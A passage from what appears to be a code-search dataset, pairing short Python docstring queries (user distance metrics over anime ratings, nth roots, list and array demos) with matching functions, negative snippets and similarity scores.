"def test_efunc_vs_invefunc(self, cosmo):\n # super().test_efunc_vs_invefunc(cosmo) # NOT b/c abstract `w(z)`\n z0 = 0.5\n z = np.array([0.5, 1.0, 2.0, 5.0])\n\n assert np.allclose(cosmo.efunc(z0), 1.0 / cosmo.inv_efunc(z0))\n assert np.allclose(cosmo.efunc(z), 1.0 / cosmo.inv_efunc(z))",
"def test_value_change(self):\n before = self.data.diffusion_data[:, :, 0, 0]\n after = module_05.run_module(self.data).diffusion_data[:, :, 0, 0]\n self.assertFalse(np.all(before == after))",
"def test_circumference():\n assert func1.circumference_circle(1) == 2 * np.pi, \"returns pi *2\"\n assert func1.circumference_circle(0) == 0, \"is 0\"\n assert func1.circumference_circle(10) == 2 * np.pi * 10",
"def fequal(pos_act, pos_exp, eps=1e-5):\n return abs(pos_act - pos_exp) < eps",
"def eq(self, y):\n return 1 - self.ne(y)",
"def test_function(self):\n # almost spherical case\n x = 1.\n y = 1.\n e1, e2 = 5e-5, 0.\n sigma = 1.\n amp = 2.\n\n f_ = self.gaussian_kappa_ellipse.function(x, y, amp, sigma, e1, e2)\n\n r2 = x*x + y*y\n f_sphere = amp/(2.*np.pi*sigma**2) * sigma**2 * (np.euler_gamma -\n expi(-r2/2./sigma**2) + np.log(r2/2./sigma**2))\n\n npt.assert_almost_equal(f_, f_sphere, decimal=4)\n\n # spherical case\n e1, e2 = 0., 0.\n f_ = self.gaussian_kappa_ellipse.function(x, y, amp, sigma, e1, e2)\n\n npt.assert_almost_equal(f_, f_sphere, decimal=4)",
"def test_t(self):\n assert np.isclose(self.stepper.t, self.final_t)",
"def test_dixon_price(self):\n fun = get_problem('dixon_price', 2, -10, 10)\n solution = np.array([1.0, 0.70710678])\n self.assertAlmostEqual(fun(solution), 0.0)",
"def test_correct_value(self):\n self.assertTrue(py_function(6) == 36)\n self.assertFalse(py_function(5) == 9)\n for i in range(0, 10):\n self.assertTrue(py_function(i) == i**2 if i != 0 else 100)"
] |
[
"0.62694824",
"0.6028754",
"0.5948653",
"0.5861675",
"0.58350295",
"0.5788916",
"0.57730377",
"0.5752578",
"0.5752459",
"0.57305455",
"0.5655151",
"0.56550866",
"0.56306046",
"0.5619683",
"0.5585245",
"0.55714893",
"0.5554394",
"0.554997",
"0.554327",
"0.5509602",
"0.54968166",
"0.5487454",
"0.54648757",
"0.54583013",
"0.54456913",
"0.54434377",
"0.5418939",
"0.54070866",
"0.5402034",
"0.5397404"
] |
0.6100563
|
1
|
Returns the euclidean distance between two User vertices.
|
def euclidean_distance(user1: User, user2: User) -> float:
    common_animes = set.intersection(set(user1.neighbor_anime.keys()),
                                     set(user2.neighbor_anime.keys()))
    return sqrt(sum(pow(anime.neighbor_users[user1] - anime.neighbor_users[user2], 2)
                    for anime in common_animes))
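In symbols, with r_a(u) denoting the score stored in anime.neighbor_users[u] and the sum running over the animes both users have rated (this notation is mine, not from the source):
\[ d(u_1, u_2) = \sqrt{\sum_{a \in A_{u_1} \cap A_{u_2}} \bigl(r_a(u_1) - r_a(u_2)\bigr)^{2}} . \]
Note that the result is 0 when the two users share no rated anime, because the empty sum evaluates to 0.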
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def EuclideanDistance( self, a, b ):\n return sqrt( self.EuclideanDistanceSq(a,b) )",
"def euclidean_distance(self,):\n return sqrt(pow((self.pose1.x - self.pose2.x), 2) +\n pow((self.pose1.y - self.pose2.y), 2))",
"def __dist(u, v):\n return spatial.distance.euclidean(u, v)",
"def get_distance(user_id1: str, user_id2: str) -> float:\n features1 = get_feature_vector(user_id1)\n features2 = get_feature_vector(user_id2)\n pass",
"def vertex_distance(self, v1, v2):\n return utils.real_distance(self.node_locations[v1], self.node_locations[v2])",
"def euclidean_distance(x1, y1, x2, y2):\n distance = math.sqrt(((x2 - x1) ** 2) + ((y2 - y1) ** 2))\n return distance",
"def euclidean_dist_vec(y1, x1, y2, x2):\n\n # euclid's formula\n distance = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\n return distance",
"def euclidean_distance(x1, x2):\n return (x2[0] - x1[0])**2 + (x2[1] - x1[1])**2",
"def cosine_distance(user1: User, user2: User) -> float:\r\n common_animes = set.intersection(set(user1.neighbor_anime.keys()),\r\n set(user2.neighbor_anime.keys()))\r\n if len(common_animes) == 0:\r\n return 1\r\n numerator = sum(anime.neighbor_users[user1] * anime.neighbor_users[user2]\r\n for anime in common_animes)\r\n denominator = _square_rooted(user1, common_animes) * _square_rooted(user2, common_animes)\r\n try:\r\n return 1 - (numerator / denominator)\r\n except ZeroDivisionError:\r\n print(user1.username)\r\n for anime in common_animes:\r\n print(anime.neighbor_users[user1])\r\n print(user2.username)\r\n for anime in common_animes:\r\n print(anime.neighbor_users[user2])\r\n return 1",
"def euclidean_distance(a, b):\n return np.linalg.norm(a - b)",
"def euclideanDistance(x1,y1,x2,y2):\n distance = math.sqrt(abs(math.pow((x2-x1),2)) + abs(math.pow((y2-y1),2)))\n return distance",
"def euclidean(self, other):\n return linalg.norm([self.x - other.x, self.y - other.y])",
"def euclidean(p1, p2):\n return p1.distance(p2)",
"def euclidian_distance(x1, y1, x2, y2):\n distance = sqrt(pow((x1-x2), 2)+(pow((y1-y2), 2)))\n return distance",
"def _euclidian_distance(self, x1, x2):\n a= x1-x2\n a2 = a**2\n b = np.sum(a2, axis=1)\n c = np.sqrt(b)\n return c",
"def euclidean_distance(x1: np.ndarray, x2: np.ndarray) -> float:\n return np.sqrt(np.square(x1 - x2).sum())",
"def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.square(np.subtract(x1, x2))))",
"def euclidean_distance(x, y):\n return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))",
"def euclidean_distance(point_one, point_two):\n return np.linalg.norm(point_one-point_two)",
"def euclidean_distance(x, y):\n x1, y1 = x\n x2, y2 = y\n return sqrt((x1 - x2)**2 + (y1 - y2)**2)",
"def euclidean_distance(vec1, vec2):\n return numpy.linalg.norm(vec1 - vec2)",
"def compute_distance(node1, node2):\n return np.linalg.norm(node1 - node2)",
"def get_euclidean_distance(self, x_coord_1, x_coord_2, y_coord_1, y_coord_2):\r\n\r\n return math.sqrt(((x_coord_1 - x_coord_2) ** 2) + \\\r\n ((y_coord_1 - y_coord_2) ** 2))",
"def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.power(x1 - x2, 2)))",
"def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n\n distance = np.linalg.norm(x - y)\n\n return distance",
"def euclidean_distance(a, b):\n return sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)",
"def compute_distance (uVector, uOther):\n ## since each element can be either 0 or 1,\n ## no need for square roots and pow\n d = 0\n for i in range (len(uVector)):\n d = d + math.pow((int(uVector [i]) - int(uOther [i])), 2)\n\n return d",
"def compute_euclidean_dist(vec1, vec2):\r\n assert len(vec1) == len(vec2)\r\n vec1 = np.array(vec1)\r\n vec2 = np.array(vec2)\r\n return np.sqrt(np.sum(np.square(vec2 - vec1)))",
"def eucl_dist(x_0, y_0, x_1, y_1):\n return sqrt((x_1 - x_0)**2 + (y_1 - y_0)**2)",
"def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n distance_vector: np.ndarray = x - y\n distance = compute_norm(distance_vector)\n return distance"
] |
[
"0.6963895",
"0.69466466",
"0.68903524",
"0.6880266",
"0.686357",
"0.6833224",
"0.6806497",
"0.6797395",
"0.6784993",
"0.6771039",
"0.6765979",
"0.67626446",
"0.67287564",
"0.671541",
"0.6711146",
"0.67072904",
"0.66899544",
"0.667745",
"0.6650605",
"0.6641603",
"0.6625499",
"0.6621939",
"0.6612432",
"0.66083455",
"0.66056526",
"0.6570237",
"0.6560911",
"0.6549321",
"0.65190166",
"0.6486659"
] |
0.7759146
|
0
|
Return the manhattan distance between two User vertices
|
def manhattan_distance(user1: User, user2: User) -> float:
    common_animes = set.intersection(set(user1.neighbor_anime.keys()),
                                     set(user2.neighbor_anime.keys()))
    return sum(abs(anime.neighbor_users[user1] - anime.neighbor_users[user2])
               for anime in common_animes)
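With the same notation as in the Euclidean case above (again, notation mine, not from the source):
\[ d(u_1, u_2) = \sum_{a \in A_{u_1} \cap A_{u_2}} \bigl| r_a(u_1) - r_a(u_2) \bigr| . \]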
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def manhattan_distance(x, y):\n return abs(x) + abs(y)",
"def get_manhattan_distance(coord_a, coord_b):\n return abs(coord_a.x - coord_b.x) + abs(coord_a.y - coord_b.y)",
"def manhattan_distance(x, y):\n return sum(abs(a - b) for a, b in zip(x, y))",
"def manhattan_distance(self):\n x, y = self.start\n other_x, other_y = self.x, self.y\n print(abs(x - other_x) + abs(y - other_y))",
"def distManhattan(p1,p2):\n (x1,y1)=p1\n (x2,y2)=p2\n return abs(x1-x2)+abs(y1-y2)",
"def get_manhattan_dist(row1, col1, row2, col2):\n distHoriz = abs(row1 - row2)\n distVert = abs(col1 - col2)\n dist = distHoriz + distVert\n return dist",
"def manhattan_distance(origin, destination):\n return abs(destination.row - origin.row) + \\\n abs(destination.column - origin.column)",
"def manhattan_dist(c1, c2):\n return abs(c1[0] - c2[0]) + abs(c1[1] - c2[1]) + abs(c1[2] - c2[2])",
"def manhattan(self, u, v):\n abs_x = abs(self.G.nodes[u][\"x\"] - self.G.nodes[v][\"x\"])\n abs_y = abs(self.G.nodes[u][\"y\"] - self.G.nodes[v][\"y\"])\n return abs_x + abs_y",
"def manhattan_distance(a: ArrayLike, b: ArrayLike) -> NDArrayFloat:\n\n return as_float(\n np.sum(np.abs(as_float_array(a) - as_float_array(b)), axis=-1)\n )",
"def calculate_manhattan(node_a, node_b):\n return (abs(node_a.x - node_b.x) + abs(node_a.y - node_b.y))",
"def manhattan_distance_between(start, destination):\n return abs(destination.x - start.x) + abs(destination.y - start.y)",
"def return_manhattan_distance(coord1, coord2):\n x1, y1 = coord1\n x2, y2 = coord2\n\n return float(abs(x2-x1) + abs(y2-y1))",
"def manhattan_distance(self):\n return calculate_manhattan_distance(self.location, self.target_location)",
"def manhattan(vector1, vector2):\n distance = 0\n # total = 0\n n = len(vector1)\n # print('vector1 => ', vector1)\n # print('vector2 => ', vector2)\n\n # print('vector1[0] => ', vector1[0])\n # print('vector1[1] => ', vector1[1])\n \n for i in range(n):\n # print('vector1[i] => ', vector1[i])\n # print('vector2[i] => ', vector2[i])\n distance += abs(vector1[i] - vector2[i])\n return distance",
"def _manhattan(pos1, pos2):\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))",
"def calculate_manhattan_dist(self):\n return self._current_cost + abs(self._current_loc.get_row() - self._goal_loc.get_row()) +\\\n abs(self._current_loc.get_column() - self._goal_loc.get_column())",
"def manhattan(a, b):\n return abs(a[0] - b[0]) + abs(a[1] - b[1])",
"def minkowski_distance(user1: User, user2: User) -> float:\r\n # predefined p_value\r\n p_value = 3\r\n common_animes = set.intersection(set(user1.neighbor_anime.keys()),\r\n set(user2.neighbor_anime.keys()))\r\n return _nth_root(sum(pow(abs(anime.neighbor_users[user1] - anime.neighbor_users[user2]),\r\n p_value) for anime in common_animes), p_value)",
"def manhattanDistance(loc1, loc2):\n # BEGIN_YOUR_CODE (our solution is 1 line of code, but don't worry if you deviate from this)\n return(sum(tuple(abs(i-j) for i,j in zip(loc1,loc2))))\n # END_YOUR_CODE",
"def manhattan(x1, y1, x2, y2):\n return abs(x1 - x2) + abs(y1 - y2)",
"def calculate_manhattan_dist(state):",
"def manhattan(x, y):\n md = np.sum(abs(x-y))\n # print md\n return md",
"def manhattan(self):\n distance = 0\n for i in range(3):\n for j in range(3):\n if self.plateau[i][j] != 0:\n x, y = divmod(self.plateau[i][j]-1, 3)\n distance += abs(x - i) + abs(y - j)\n return distance",
"def manhattanDis(self, pos1, pos2):\n (x1, y1) = pos1\n (x2, y2) = pos2\n return abs(x1-x2) + abs(y1-y2)",
"def manhattanDistance(loc1, loc2):\n # BEGIN_YOUR_ANSWER (our solution is 1 lines of code, but don't worry if you deviate from this)\n return sum([abs(loc2[i]-l1) for i, l1 in enumerate(loc1)])\n # END_YOUR_ANSWER",
"def manhattan(x,y):\n\tassert (isinstance(x, BayesNet) and isinstance(y, BayesNet)), 'Must pass in BayesNet objects.'\n\tassert (x==y), 'Passed-in BayesNet objects are not structurally equal.'\n\n\tdistance = np.sum( np.abs( x.flat_cpt() - y.flat_cpt() ) )\n\treturn distance",
"def manhattan_distance(self):\n dist = 0\n for target, tile in zip(self.winCdt[:-1], self.tiles[:-1]):\n dist += abs(target[0] - tile[0]) + abs(target[1] - tile[1])\n return dist",
"def manhattan_distances(X, Y):\r\n D = np.zeros((X.shape[0],Y.shape[0]))\r\n \r\n for X_idx in range(X.shape[0]):\r\n for Y_idx in range(Y.shape[0]): \r\n \r\n D[X_idx,Y_idx] = np.sum(np.abs(X[X_idx,:] - Y[Y_idx,:]))\r\n \r\n return D",
"def heuristic_manhattan_distance(self):\n distance = 0\n\n for i in range(self.PUZZLE_NUM_ROWS):\n for j in range(self.PUZZLE_NUM_COLUMNS):\n i1, j1 = self._get_coordinates(self.position[i][j], self.PUZZLE_END_POSITION)\n distance += abs(i - i1) + abs(j - j1)\n\n return distance"
] |
[
"0.75152785",
"0.74619585",
"0.74610585",
"0.73415506",
"0.7291795",
"0.7279972",
"0.72796065",
"0.7268842",
"0.7196731",
"0.719276",
"0.7189901",
"0.71806836",
"0.71418595",
"0.71008533",
"0.70642215",
"0.7021635",
"0.7007767",
"0.6989743",
"0.69610256",
"0.693819",
"0.69203496",
"0.6914366",
"0.6908984",
"0.6825278",
"0.67967075",
"0.67909133",
"0.6789061",
"0.6776867",
"0.67662543",
"0.6762081"
] |
0.82790244
|
0
|
Return the n_root of a value.
|
def _nth_root(value, n_root) -> float:
    root_value = 1 / float(n_root)
    return Decimal(value) ** Decimal(root_value)
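A minimal usage sketch of the helper above (the example values are illustrative; note that Decimal ** Decimal actually yields a Decimal, not the annotated float):

from decimal import Decimal

def _nth_root(value, n_root) -> float:
    # Same body as above, repeated so the sketch is self-contained.
    root_value = 1 / float(n_root)
    return Decimal(value) ** Decimal(root_value)

print(_nth_root(27, 3))          # very close to Decimal('3'); 1/3 is not exact in binary floating point
print(float(_nth_root(32, 5)))   # 2.0 - the tiny excess from Decimal(0.2) rounds away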
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _nth_root(value, n_root):\n return value ** (1 / n_root)",
"def n_root_of_x(n, x):\n if n==0:\n return 1\n \n return 1 if n==0 else x**(1.0/n)",
"def nth_root(n):\n def actual_root(x):\n \"\"\"Returns the nth root of x\"\"\"\n root = x ** (1/n)\n\tprint(x)\n return root\n return actual_root",
"def nthRoot(x,n):\n return op.pow(x,1/n)",
"def actual_root(x):\n root = x ** (1/n)\n\tprint(x)\n return root",
"def integer_root(n,k):\n # from https://stackoverflow.com/questions/15978781/how-to-find-integer-nth-roots/15979957:\n # Newton's method to find kth root of n\n u, s = n, n+1\n while u < s:\n s = u\n t = (k-1) * s + n // pow(s, k-1)\n u = t // k\n return s",
"def nth_root_of_a(n, a):\n return find_zero(lambda x: pow(x, n) - a, lambda x: n * pow(x, n-1))",
"def sroot(n):\n\n return int(n ** 0.5) == n ** 0.5",
"def n_value(self) -> int:\n return self.my_n",
"def square_root(value):\n # Init\n root = 1.0 # Provisional square root\n difference = (root * root) - value # How far off is our provisional root\n\n ##--- Loop until the provisional root is close enough to the actual root ----###\n while difference > 0.00000001 or difference < -0.00000001:\n root = (root + (value / root)) / 2 # Compute new provisional root\n difference = (root * root) - value # # How far off is our current approximation?\n \n return root",
"def _root():\n return 0",
"def find_root_1(x, n, p=0.001):\n step = p / 10\n guess = step\n while abs(guess ** n - x) > p:\n guess += step\n return round(guess, 3)",
"def root_0(a):\n return 0",
"def cube_root(val):\n return val ** (1 / 3)",
"def nN(self):\n return int(self.vnN.prod())",
"def find_root_2(x, n, p=0.001):\n step = p / 10\n left, right = 0, x\n while True:\n guess = (left + right) / 2\n result = guess ** n\n if abs(result - x) <= p:\n break\n elif result > x + p:\n right = guess - step\n else:\n left = guess + step\n\n if round(guess) ** n == x:\n return round(guess)\n return round(guess, 3)",
"def count_value(tree,val):\r\n if (tree==None):\r\n return 0\r\n elif(value(tree)==val):\r\n return 1+count_value(left(tree), val)+count_value(right(tree), val)\r\n else:\r\n return count_value(left(tree), val)+count_value(right(tree), val)",
"def find(self, value):\n if self.value is None:\n raise BinaryTreeValueError(\"Value {} not in tree\")\n\n if self.value == value:\n return self.left_length\n\n elif value < self.value:\n # Value is in left side of tree\n return self.left.find(value)\n\n else:\n # Value is in right side of tree\n return self.right.find(value) + self.left_length + 1",
"def kth_root_modulo(a, k, n):\n # x = g^y => x^k = (g^k)^y = a\n # => y = log_{g^k} a (mod n)\n g = primitive_root(n)\n gk = powmod(g, k, n)\n y = log_modulo(gk, a, n)\n return powmod(g, y, n)",
"def getN(self)->int:\n return self.n",
"def num_tree(self):\n if self.handle is None:\n raise AttributeError('Model not loaded yet')\n out = ctypes.c_size_t()\n _check_call(_LIB.TreeliteQueryNumTree(self.handle, ctypes.byref(out)))\n return out.value",
"def n():\n # For documentation purposes",
"def dist_from_root(self, index):\n if index == 0:\n return 0\n return self.dist_from_root(self.parent(index)) + 1",
"def rank(self, value):\n i = 0\n n = len(self._tree)\n rank = 0\n count = 0\n while i < n:\n cur = self._tree[i]\n if value < cur:\n i = 2 * i + 1\n continue\n elif value > cur:\n rank += self._counts[i]\n # subtract off the right tree if exists\n nexti = 2 * i + 2\n if nexti < n:\n rank -= self._counts[nexti]\n i = nexti\n continue\n else:\n return (rank, count)\n else: # value == cur\n count = self._counts[i]\n lefti = 2 * i + 1\n if lefti < n:\n nleft = self._counts[lefti]\n count -= nleft\n rank += nleft\n righti = lefti + 1\n if righti < n:\n count -= self._counts[righti]\n return (rank, count)\n return (rank, count)",
"def rank(self, value):\n i = 0\n n = len(self._tree)\n rank = 0\n count = 0\n while i < n:\n cur = self._tree[i]\n if value < cur:\n i = 2 * i + 1\n continue\n elif value > cur:\n rank += self._counts[i]\n # subtract off the right tree if exists\n nexti = 2 * i + 2\n if nexti < n:\n rank -= self._counts[nexti]\n i = nexti\n continue\n else:\n return (rank, count)\n else: # value == cur\n count = self._counts[i]\n lefti = 2 * i + 1\n if lefti < n:\n nleft = self._counts[lefti]\n count -= nleft\n rank += nleft\n righti = lefti + 1\n if righti < n:\n count -= self._counts[righti]\n return (rank, count)\n return (rank, count)",
"def simple_root(self, i):",
"def primitive_root(n):\n if n == 2:\n return 1\n phi = euler_phi(n)\n phi_divisors = factorize(phi)\n for g in range(2, n + 1):\n if gcd(g, n) != 1:\n continue\n for d, _ in phi_divisors:\n if powmod(g, phi // d, n) == 1:\n # g can not be a generator\n break\n else:\n return g\n\n # generator not found\n # Gauss theorem conditions did not met\n return None",
"def scale_root(self) -> int:\r\n ...",
"def fn(node):\n nonlocal ans\n if not node: return 0 \n sm = fn(node.left) + fn(node.right)\n if sm == node.val: ans += 1\n return sm + node.val",
"def is_root(self, n):\n return n == self._root"
] |
[
"0.79498124",
"0.713204",
"0.69784826",
"0.6963353",
"0.6950171",
"0.65510285",
"0.64180315",
"0.62910885",
"0.6132244",
"0.60917604",
"0.6063739",
"0.5974272",
"0.5893334",
"0.58790827",
"0.57461566",
"0.5711435",
"0.56959045",
"0.5678474",
"0.56771743",
"0.56726843",
"0.5657271",
"0.5630658",
"0.55882186",
"0.5587705",
"0.5587705",
"0.55382055",
"0.553343",
"0.55259424",
"0.5506445",
"0.5502789"
] |
0.75039595
|
1
|
Return the square rooted value of the sum of squares of user review scores.
|
def _square_rooted(user: User, animes: set[Anime]) -> float:
    return sqrt(sum([anime.neighbor_users[user] * anime.neighbor_users[user]
                     for anime in animes]))
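In other words, this is the Euclidean norm of the user's scores restricted to the given anime set (notation mine, not from the source):
\[ \lVert u \rVert_{A} = \sqrt{\sum_{a \in A} r_a(u)^{2}} , \]
which is how the cosine_distance helper quoted earlier in this file appears to use it, as the denominator of the cosine distance.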
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def calc_rmse(self, data):\n res= data.score- data[['userid','itemid']].apply(lambda row:self.calc_score(row[0], row[1]),axis=1)\n res=[el**2 for el in np.array(res)]\n return np.sqrt(np.sum(res)/data.shape[0])",
"def root_mean_square_value( values ):\n return ma.sqrt(mean_square_value( values ))",
"def calc_score(self, user_id, item_id): \n p = np.dot(self.U[user_id], self.V[item_id])\n if self.trunc_score_rule==None:pass\n else: p=self.trunc_score_rule(p)\n \n return p",
"def get_final_score(self, user):\n\n iq_subject_score = self.get_overall_score(user=user)\n\n try:\n speech_score = UserQuizMark.objects.filter(user=user, quiz=self.get_object('speech_training')).latest(\n 'timestamp').marks\n drawing_score = UserQuizMark.objects.filter(user=user, quiz=self.get_object('drawing')).latet(\n 'timestamp').marks\n except UserQuizMark.DoesNotExist:\n raise Http404\n\n avg_speech_drawing_score = speech_score + drawing_score\n\n return (iq_subject_score + avg_speech_drawing_score) / 2",
"def get_mean_score(rating_scores):\n return sum(rating_scores) / len(rating_scores)",
"def root_mean_square_error(y, y_pred, w):\n return np.sqrt(np.average(((y_pred - y) ** 2), weights=w))",
"def _calculate_score(predictions: np.ndarray, correct: np.ndarray) -> float:\n return np.sqrt(np.sum(np.square(np.log(predictions + 1) - np.log(correct + 1))) / len(correct))",
"def _root_sum_of_squares(list):\n return sum((el ** 2 for el in list)) ** (0.5)",
"def sum_of_squares(x):\r\n return dot(x, x)",
"def rootsumsquares(a):\n\treturn np.sqrt(np.sum(np.power(a,2)))",
"def _square_rooted(x):\n return sqrt(sum([(a * a) for a in x]))",
"def rSquare(estimations, measureds):\n SEE = (( np.array(measureds) - np.array(estimations) )**2 ).sum()\n mMean = (np.array(measureds)).sum() / float(len(measureds))\n dErr = ((mMean - measureds)).sum()\n \n return 1 - (SEE / dErr)",
"def sumsquares(self):\n return np.dot((self.demeaned ** 2).T, self.weights)",
"def RMSE(ratings, range):\n\n return sqrt(MSE(ratings, range))",
"def getScore(self):\n return sum(self.field)",
"def getScores(self, w1, w2, w3):\r\n Fw = 2.26 * 3\r\n score = round((float(w1) * float(w2) * float(w3)) ** Fw, 6) # Keep six decimal places\r\n return score",
"def root_mean_squared_error(y_true, y_pred):\n return sm.mean_squared_error(y_true, y_pred)**0.5",
"def _rsq(self):\n return self._ss_reg / self._ss_tot",
"def root_mean_square(xs):\n squares = xs ** 2\n sum_squares = np.sum(squares)\n\n rms = math.sqrt((len(xs) ** -1) * sum_squares)\n return rms",
"def root_sum_of_squares(data, dim=0):\n return torch.sqrt((data ** 2).sum(dim))",
"def root_sum_of_squares(data, dim=0):\n return torch.sqrt((data ** 2).sum(dim))",
"def score(self):\n result = 1\n one_node = self.cups.locate_node(1)\n a = one_node.next()\n b = a.next()\n\n result = a.value * b.value\n\n return result",
"def _compute_scores(self, triples):\n # compute scores as sum(s * p * o)\n scores = tf.reduce_sum(triples[0] * triples[1] * triples[2], 1)\n return scores",
"def total_sum_of_squares(y: np.ndarray) -> float:\n return np.sum(np.square(y - np.linalg.norm(y)))",
"def calculate_score(player_cards):\n score = sum(player_cards)\n return score",
"def sum_of_squares(v: Vector) -> float:\n return dot(v,v)",
"def get_real_rating(self):\n if not (self.votes and self.score):\n return 0\n return float(self.score)/self.votes",
"def get_fisher_rao_norm_squared(self, sess, x_test, y_test):\n pred_np = self.get_prediction(sess, x_test)\n dl_df_np = self.get_dl_df(sess, x_test, y_test)\n prod = pred_np * dl_df_np\n inner_prod_vector = np.sum(prod, axis = 0)\n inner_prod_squared = inner_prod_vector * inner_prod_vector\n return np.mean(inner_prod_squared)",
"def sum_of_squares(v: Vector) -> float:\n return dot(v, v)",
"def sum_of_squares(v: Vector) -> float:\n return dot(v, v)"
] |
[
"0.67789346",
"0.6725351",
"0.67098415",
"0.6668904",
"0.66526634",
"0.650096",
"0.64910007",
"0.6392752",
"0.6374066",
"0.63549167",
"0.63388354",
"0.6285989",
"0.6280445",
"0.6243268",
"0.6229393",
"0.6226667",
"0.6225889",
"0.6224023",
"0.61846817",
"0.6182643",
"0.6182643",
"0.6176689",
"0.61630267",
"0.61527854",
"0.61495084",
"0.6145002",
"0.6144133",
"0.61435187",
"0.6137258",
"0.6137258"
] |
0.6883933
|
0
|
Using append(), insert(), remove(), pop(), extend(), count(), index(), reverse(), len(), ... Also, the "in" and "not in" operators can be used to search lists for the occurrence of a given element.
|
def demonstrate_list_methods():
    john = ['John Lennon', 1940, True]
    # john.append('Liverpool')
    # print(john)
    print(john.append('Liverpool'))
    print(john)
    john.insert(2, 'The Beatles')
    print(john)
    john.remove(1940)
    print(john)
    del john[True]
    print(john)
    john.extend(['Paul McCartney', 'The Beatles'])
    print(john)
    john.append('Liverpool')
    print(john)
    print(john.count('Liverpool'))
    print(john.index('Liverpool'))
    john.reverse()
    print(john)
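Two behaviours worth calling out in the snippet above (standard Python semantics, not specific to this code): list.append() mutates in place and returns None, which is why the first print() shows None, and del john[True] removes the element at index 1 because bool is a subclass of int. A minimal illustration:

lst = ['a', 'b', 'c']
print(lst.append('d'))   # None - append() returns nothing, it only mutates lst
del lst[True]            # True == 1, so the element at index 1 is removed
print(lst)               # ['a', 'c', 'd']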
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __contains__(self, elem):\n return elem in list(self)",
"def test_contains(self):\n s = djset()\n s.add([1, 2, 3])\n s.add([4, 5, 6])\n self.assertTrue(2 in s)\n self.assertTrue(5 in s)",
"def contains(self, other):",
"def contains(self, element):\n pass",
"def in_list(value, arg):\r\n return value in arg",
"def __contains__(self, i):\n return i in self._ar",
"def _listContains(self, l, entry):\n for i in range(0, len(l)):\n if l[i] == entry:\n return True\n return False",
"def __contains__(self, item):",
"def contains(self, *args):\n pass",
"def test_in_list(self):\n\n # get available ids\n ids = list(DQ(\"(b.id) Book b\").tuples())\n ids = [id[0] for id in ids]\n\n # take just three of them\n c = {\"ids\": ids[:3]}\n dq = DQ(\"(b.id, b.name) Book{b.id in '$(ids)'} b\")\n r = list(dq.context(c).dicts())\n\n # make sure we got three of them\n self.assertEqual(len(r), 3)",
"def testContains(self):\n\n N = randint(20,100)\n for i in xrange(N):\n self.s.insert(i,True)\n N-=(i in self.s)\n\n self.assertEqual(N,0)",
"def isin(hi):\n return finder.search(hi)",
"def contains(list, e):\r\n for elem in list:\r\n if elem == e:\r\n return True\r\n return False",
"def all_in_set(the_set, the_list):\n return True",
"def __contains__(self, item):\n # type(Any) -> bool\n return list.__contains__(self, self.ref(item))",
"def __contains__(self,x):\n return 0 <= x < len(self)",
"def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False",
"def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False",
"def test_linked_list_includes_all_input_elements():\n a = [5, 6, 7, 8]\n aa = LinkedList([])\n aa.insert(a)\n for i in a:\n assert aa.includes(i) is True\n assert len(aa) == len(a)",
"def add_this_many(x, el, s):\r\n count = 0\r\n for i in range(len(s)):\r\n if s[i] == x:\r\n count +=1\r\n while count > 0:\r\n s.append(el)\r\n count -= 1",
"def contains(self, *args):\n return _libsbml.IdList_contains(self, *args)",
"def contains(collection, target):\n\treturn target in collection",
"def __contains__(self, v):\n for i in self:\n if v in i:\n return True\n False",
"def occurrences(lstObjects, objVal):\n lstNew = []\n\n for itm in lstObjects:\n if itm == objVal:\n lstNew.append(itm)\n\n return lstNew;",
"def sublist_in(lst, sublst):\n for i in sublst:\n if i not in lst:\n return False\n return True",
"def __contains__(self, item):\n pass",
"def insert_items(lst, entry, elem):\n# index = 0\n# for index in range(len(lst)):\n# if lst[index] == entry:\n# lst.insert(index+1, elem)\n# if entry == elem:\n# index += 1\n index = 0 \n while index < len(lst):\n if lst[index] == entry:\n lst.insert(index+1, elem)\n if entry == elem:\n index += 1\n index += 1\n return lst",
"def exist(self,list,a):\r\n\t\ti = 0\r\n\t\tfor elem in list:\r\n\t\t\tif (elem == a):\r\n\t\t\t\ti=i+1\r\n\t\tif (i>0):\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False",
"def contains(base, sub_list):\n\n return set(base) & set(sub_list) == set(sub_list)",
"def __contains__(self, x):\n return x in (v for v, _ in self)"
] |
[
"0.60959727",
"0.5751839",
"0.5720554",
"0.55933017",
"0.5549648",
"0.54963696",
"0.5443714",
"0.5430824",
"0.5384499",
"0.5320489",
"0.5310426",
"0.5304248",
"0.5287764",
"0.52701306",
"0.5247795",
"0.52417976",
"0.52148986",
"0.52148986",
"0.516982",
"0.51644474",
"0.51314145",
"0.5113813",
"0.50995606",
"0.50989056",
"0.5089158",
"0.508865",
"0.5083433",
"0.50682217",
"0.5066977",
"0.50645643"
] |
0.5912757
|
1
|
Using array.array() to build list-based numeric arrays. Demonstrating that lists and arrays are different types.
|
def demonstrate_arrays():
    from array import array
    a = array('i', [4, 2, 8, 9])
    print(a)
    print(type(a))
    l = [4, 2, 8, 9]
    print(l)
    print(type(l))
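A minimal sketch of the type difference the docstring points at: array.array('i', ...) is a homogeneous, typecode-checked container, while a plain list accepts anything (standard library behaviour):

from array import array

a = array('i', [4, 2, 8, 9])
try:
    a.append(3.5)            # rejected: 'i' arrays only hold signed integers
except TypeError as err:
    print(err)

l = [4, 2, 8, 9]
l.append(3.5)                # a list happily mixes types
print(a)
print(l)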
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
